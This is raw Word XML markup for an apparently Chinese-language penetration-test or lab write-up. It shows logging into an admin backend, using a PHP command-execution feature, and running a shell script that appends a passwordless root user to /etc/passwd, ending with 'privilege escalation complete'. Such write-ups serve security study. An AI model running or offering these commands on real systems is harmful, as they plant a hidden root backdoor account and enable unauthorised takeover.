    <w:p w14:paraId="1892F7AE" w14:textId="2EFFA7AC" w:rsidR="00EE45A4" w:rsidRDefault="00EE45A4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 w:rsidRPr="00EE45A4">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>ForlorfroxAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F804A" w14:textId="1AF5677B" w:rsidR="009B37EB" w:rsidRDefault="009B37EB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</w:p>
    <w:p w14:paraId="08639D3A" w14:textId="3082CAAB" w:rsidR="009B37EB" w:rsidRDefault="009B37EB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lastRenderedPageBreak/>
        <w:t>登录后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20C770C4" wp14:editId="3E35597F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>7696</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-33390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3134360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21530"/>
                <wp:lineTo x="21532" y="21530"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12621700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0062" name="图片 12621700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后台页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B3F31" w14:textId="3C9A92D0" w:rsidR="009B37EB" w:rsidRDefault="00D04102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Php</w:t>
      </w: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中可执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158529D" w14:textId="4BDBC7B4" w:rsidR="00D04102" w:rsidRDefault="00D04102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 w:rsidRPr="00D04102">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>echo "echo '0dayhp::0:0:0dayhp:/root:/bin/bash' &gt;&gt; /etc/passwd" &gt; test.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA114DB" w14:textId="565DACFB" w:rsidR="00D04102" w:rsidRDefault="00D04102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新建一个有管理员权限并且密码为空的用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499CF06C" w14:textId="03D05869" w:rsidR="00D04102" w:rsidRDefault="005838DE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在后台执行命令的地方</w:t>
      </w:r>
      <w:r w:rsidRPr="005838DE">
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>/bin/bash /tmp/test.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F5E25" w14:textId="78BCB364" w:rsidR="005838DE" w:rsidRDefault="005838DE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执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6470EDDA" w14:textId="16D8FC81" w:rsidR="009B37EB" w:rsidRDefault="009B37EB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</w:p>
    <w:p w14:paraId="4DFF2638" w14:textId="39F7BF5E" w:rsidR="009B37EB" w:rsidRDefault="00B7530C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/>
          <w:noProof/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="707559BA" wp14:editId="61B8E289">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>600710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3048425" cy="409632"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21098"/>
                <wp:lineTo x="21465" y="21098"/>
                <wp:lineTo x="21465" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="16663933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3367" name="图片 16663933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8D813" w14:textId="77777777" w:rsidR="009B37EB" w:rsidRDefault="009B37EB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</w:p>
    <w:p w14:paraId="44460E4E" w14:textId="3BD51ACF" w:rsidR="009B37EB" w:rsidRDefault="00B7530C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  <w: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  <w:t>完成提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5837F6" w14:textId="77777777" w:rsidR="009B37EB" w:rsidRDefault="009B37EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E9765A" w14:textId="17A2FD01" w:rsidR="009B37EB" w:rsidRPr="007B4FD7" w:rsidRDefault="009B37EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:eastAsia="宋体" w:hAnsi="sans-serif" w:cs="sans-serif" w:hint="eastAsia"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009B37EB" w:rsidRPr="007B4F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66700D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4621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6003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jQ3NjZiNTA3NmYwZjdkYWQ4MDVjNmQ4MzYxMDUxMzAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00835287"/>
    <w:rsid w:val="00144DAB"/>
    <w:rsid w:val="00151D70"/>
    <w:rsid w:val="001B2141"/>
    <w:rsid w:val="001B2E9B"/>
    <w:rsid w:val="00245BAF"/>
    <w:rsid w:val="003511A5"/>
    <w:rsid w:val="00475575"/>
    <w:rsid w:val="004F782B"/>
    <w:rsid w:val="00552F70"/>
    <w:rsid w:val="005838DE"/>
    <w:rsid w:val="00635948"/>
    <w:rsid w:val="00735F6D"/>
    <w:rsid w:val="007441BA"/>
    <w:rsid w:val="007B4FD7"/>
    <w:rsid w:val="007D55F8"/>
    <w:rsid w:val="00835287"/>
    <w:rsid w:val="00877075"/>
    <w:rsid w:val="008B7218"/>
    <w:rsid w:val="008E7657"/>
    <w:rsid w:val="00911189"/>
    <w:rsid w:val="0092090D"/>
    <w:rsid w:val="009A1408"/>
    <w:rsid w:val="009A6451"/>
    <w:rsid w:val="009B37EB"/>
    <w:rsid w:val="009F658E"/>
    <w:rsid w:val="00B613F4"/>
    <w:rsid w:val="00B7530C"/>
    <w:rsid w:val="00D04102"/>
    <w:rsid w:val="00EE45A4"/>
    <w:rsid w:val="00EE68C0"/>
    <w:rsid w:val="00F00061"/>
    <w:rsid w:val="05F14621"/>
    <w:rsid w:val="51073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54A2CD"/>
  <w15:docId w15:val="{3EFA29C6-66D2-4FE5-9A59-0FCF57429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41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12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95829</dc:creator>
  <cp:lastModifiedBy>鱼香 张</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-16T04:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-10T06:16:00Z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2327EE2DEFEB43839D6E5C5153D2C4AB_12</vt:lpwstr>
  </property>
</Properties>
</file>